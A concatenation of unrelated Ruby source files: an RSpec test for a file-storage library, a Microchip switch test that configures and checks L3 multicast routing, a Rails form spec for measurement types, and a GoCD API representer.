expect(data).to eq('DATA-y')
expect(data.encoding).to eq(Encoding::ISO_8859_15)
r.close
info = subject.info('y.txt')
expect(info.mode).to eq(0).or eq(0o644)
end
it 'raises FileNotFound if not found on read' do
expect { subject.read('not/found.txt') }.to raise_error(BFS::FileNotFound)
end
it 'gracefullies abort on errors' do
expect do
subject.create('x.txt') do |io|
io.write 'TESTDATA'
raise 'doh!'
end
end.to raise_error(RuntimeError, 'doh!')
expect { subject.read('x.txt') }.to raise_error(BFS::FileNotFound)
end
it 'removes' do
subject.rm('a/b/c.txt')
subject.rm('not/found.txt')
expect(subject.ls).to match_array [
'a/b.txt',
'a/b/c/d.txt',
'a/b/c/d/e.txt',
]
end
it 'copies' do
subject.cp('a/b/c.txt', 'x.txt')
expect(subject.ls.count).to eq(5)
expect(subject.read('x.txt')).to eq('TESTDATA-c')
expect { subject.cp('missing.txt', 'x.txt') }.to raise_error(BFS::FileNotFound)
end
it 'moves' do
subject.mv('a/b/c.txt', 'x.txt')
expect(subject.ls.count).to eq(4)
expect(subject.read('x.txt')).to eq('TESTDATA-c')
expect { subject.read('a/b/c.txt') }.to raise_error(BFS::FileNotFound)
expect { subject.mv('missing.txt', 'x.txt') }.to raise_error(BFS::FileNotFound)
end
end
| 28.526316 | 90 | 0.604935 |
38f3f65767501491592b4acbd5265a20d7833193 | 7,464 | #!/usr/bin/env ruby
# Copyright (c) 2004-2020 Microchip Technology Inc. and its subsidiaries.
# SPDX-License-Identifier: MIT
require_relative 'libeasy/et'
require_relative 'libeasy/utils'
$ts = get_test_setup("mesa_pc_b2b_4x")
#---------- Capabilities -----------------------------------------------------
cap_check_exit("L3")
#---------- Test parameters ----------------------------------------------------
$router_mac = "00:01:02:03:04:05"
$conf_table =
[
{
vid: 2,
sip: "10.1.1.1",
mcast: "230.1.1.1",
ipv6_sip: "01::1:1",
ipv6_mcast: "ff00::0102:0304",
rt_rpf: false,
},
{
vid: 3,
sip: "20.1.1.1",
mcast: "230.1.1.2",
ipv6_sip: "02::2:2",
ipv6_mcast: "ff00::0102:0305",
rt_rpf: true,
},
{
vid: 4,
},
]
$frame_table =
[
{
tx_port: 1,
dmac: "33:33:01:02:03:01",
vid: 3,
sip: "01::1:1",
mcast: "ff00::0102:0304",
expect_rx: true
},
{
tx_port: 1,
dmac: "33:33:01:02:03:01",
vid: 3,
sip: "02::2:2",
mcast: "ff00::0102:0305",
expect_rx: true
},
{
tx_port: 2,
dmac: "33:33:01:02:03:01",
vid: 4,
sip: "01::1:1",
mcast: "ff00::0102:0304",
expect_rx: true
},
{
tx_port: 2,
dmac: "33:33:01:02:03:01",
vid: 4,
sip: "02::2:2",
mcast: "ff00::0102:0305",
expect_rx: false # false due to RFP is enabled
},
{
tx_port: 1,
dmac: "01:00:5e:01:01:01",
vid: 3,
sip: "10.1.1.1",
mcast: "230.1.1.1",
expect_rx: true
},
{
tx_port: 1,
dmac: "01:00:5e:01:01:01",
vid: 3,
sip: "20.1.1.1",
mcast: "230.1.1.2",
expect_rx: true
},
{
tx_port: 2,
dmac: "01:00:5e:01:01:01",
vid: 4,
sip: "10.1.1.1",
mcast: "230.1.1.1",
expect_rx: true
},
{
tx_port: 2,
dmac: "01:00:5e:01:01:01",
vid: 4,
sip: "20.1.1.1",
mcast: "230.1.1.2",
expect_rx: false # false due to RFP is enabled
},
]
#---------- Configuration -----------------------------------------------------
$rleg_vid = []
$mc_conf = []
#$ts.dut.run "mesa-cmd deb trace api_ail l3 info"
test "l3-mc-conf" do
$conf_table.each_with_index do |e, idx|
test "Set VLAN port configuration" do
port = $ts.dut.p[idx]
pvid = e[:vid]
conf = $ts.dut.call "mesa_vlan_port_conf_get", port
conf["pvid"] = pvid
conf["untagged_vid"] = pvid
conf["port_type"] = "MESA_VLAN_PORT_TYPE_UNAWARE"
$ts.dut.call "mesa_vlan_port_conf_set", port, conf
end
test "Set VLAN memberships" do
$ts.dut.call "mesa_vlan_port_members_set", e[:vid], "#{$ts.dut.port_list[idx]}"
end
end
# Enable routing and setup router MAC address
rt_mac = $router_mac.split(":")
rt_mac.each_with_index{|val, index | rt_mac[index] = val.to_i}
conf = {
rleg_mode: "MESA_ROUTING_RLEG_MAC_MODE_SINGLE",
base_address: {addr: rt_mac},
routing_enable: false,
mc_routing_enable: true
}
$ts.dut.call "mesa_l3_common_set", conf
test "Add router legs" do
$conf_table.each_with_index do |e, idx|
conf = {
rleg_enable: false,
rleg_id: 0,
ipv4_unicast_enable: false,
ipv6_unicast_enable: false,
ipv4_multicast_enable: true,
ipv6_multicast_enable: true,
ipv4_icmp_redirect_enable: false,
ipv6_icmp_redirect_enable: false,
vlan: e[:vid],
vrid0_enable: false,
vrid0: 0,
vrid1_enable: false,
vrid1: 0,
mc_ttl_limit_enable: false,
mc_ttl_limit: 0
}
$ts.dut.call "mesa_l3_rleg_add", conf
$rleg_vid << e[:vid]
end
end
test "Add multicast routes" do
["v4", "v6"].each {|ver|
$conf_table.each_with_index do |e, idx|
if !e.key?(:sip)
next
end
if ver == "v6" && !e.key?(:ipv6_sip)
next
end
if ver == "v4"
ip_src = IPAddr.new(e[:sip]).to_i
ip_mcast = IPAddr.new(e[:mcast]).to_i
ipv4_mc = {
source: ip_src,
group: ip_mcast
}
else
sip = ipv6_str2arr(e[:ipv6_sip])
dip = ipv6_str2arr(e[:ipv6_mcast])
ipv6_mc = {
source: ip_src = { addr: sip },
group: ip_mcast = { addr: dip }
}
end
if e[:rt_rpf]
src_rleg = e[:vid]
else
src_rleg = 0
end
conf = {}
if ver == "v4"
conf = {
type: false,
route: {
ipv4_mc: ipv4_mc,
},
source_rleg: src_rleg
}
else
conf = {
type: true,
route: {
ipv6_mc: ipv6_mc,
},
source_rleg: src_rleg
}
end
$ts.dut.call "mesa_l3_mc_route_add", conf
$ts.dut.call "mesa_l3_mc_route_rleg_add", conf, $conf_table[0][:vid]
if !$mc_conf.include? conf
$mc_conf << conf
end
end
}
end # test mc_conf
end
#---------- Frame testing -----------------------------------------------------
test "mc-frame-routing-io" do
# Tx frames from port 1 and 2 and expect only to receive from 1 (on port 0)
$frame_table.each_with_index do |e, idx_tx|
ip = "ipv4"
et = "0x0800"
ttl = "ttl"
if e[:dmac].include? "33:33"
ip = "ipv6"
et = "0x86dd"
ttl = "hlim"
end
idx_tx = e[:tx_port]
tx_dmac = e[:dmac]
tx_smac = idx_tx + 1
tx_ip_src = e[:sip]
tx_ip_dst = e[:mcast]
vid = e[:vid]
ttl_tx = 64
ttl_rx = ttl_tx - 1
cmd = "sudo ef name f#{idx_tx} eth dmac #{tx_dmac} smac #{tx_smac} "
cmd += "et #{et} #{ip} sip #{tx_ip_src} dip #{tx_ip_dst} #{ttl} #{ttl_tx} "
cmd += "tx #{$ts.pc.p[idx_tx]} name f#{idx_tx} "
idx_rx = 0
cmd += "name f#{idx_rx} eth dmac #{tx_dmac} smac #{$router_mac} et #{et} "
cmd += "#{ip} sip #{tx_ip_src} dip #{tx_ip_dst} #{ttl} #{ttl_rx} "
if e[:expect_rx]
cmd += "rx #{$ts.pc.p[idx_rx]} name f#{idx_rx}"
else
cmd += "rx #{$ts.pc.p[idx_rx]}"
end
$ts.pc.try cmd
end
end
$mc_conf.each do |rt, vid|
active = $ts.dut.call "mesa_l3_mc_route_active_get", rt
if !active
t_e "Route was not hit??"
end
active = $ts.dut.call "mesa_l3_mc_route_active_get", rt
if active
t_e "Route hit should be cleared hit??"
end
end
#---------- Cleanup -----------------------------------------------------
$mc_conf.each do |rt, vid|
$ts.dut.call "mesa_l3_mc_route_del", rt
end
$rleg_vid.each do |vid|
$ts.dut.call "mesa_l3_rleg_del", vid
end
| 27.240876 | 91 | 0.456994 |
79e5c3b1fae948ff440283c50c552afc52029b33 | 918 | require 'rails_helper'
describe "When I visit the measurement_type New page" do
let(:user) { create(:user, role: "admin") }
before do
sign_in user
end
it "Then I see the measurement_type form" do
visit new_measurement_type_path
expect(page).to have_content("New Measurement Type")
expect(page).to have_content("Name")
expect(page).to have_content("Unit")
end
it "I can create a new measurement_type" do
visit new_measurement_type_path
fill_in('Name', with: "Length")
fill_in('Unit', with: "cm")
click_button('Submit')
expect(page).to have_content("Length")
expect(page).to have_content("cm")
end
context "As a non-admin user" do
it "Then I should not have access to the measurement types action form" do
user.update(role: "user")
visit new_measurement_type_path
expect(page).to have_content 'Not authorized'
end
end
end
| 23.538462 | 78 | 0.691721 |
5d4410e4c0f411c6c83b689999697bf7d29e7d41 | 1,107 | ##########################################################################
# Copyright 2016 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
module ApiV1
class CommandSnippetsRepresenter < ApiV1::BaseRepresenter
link :self do |opts|
opts[:url_builder].apiv1_admin_internal_command_snippets_url(:prefix => opts[:prefix])
end
collection :command_snippets, embedded: true, exec_context: :decorator, decorator: CommandSnippetRepresenter
def command_snippets
represented
end
end
end | 38.172414 | 112 | 0.65673 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.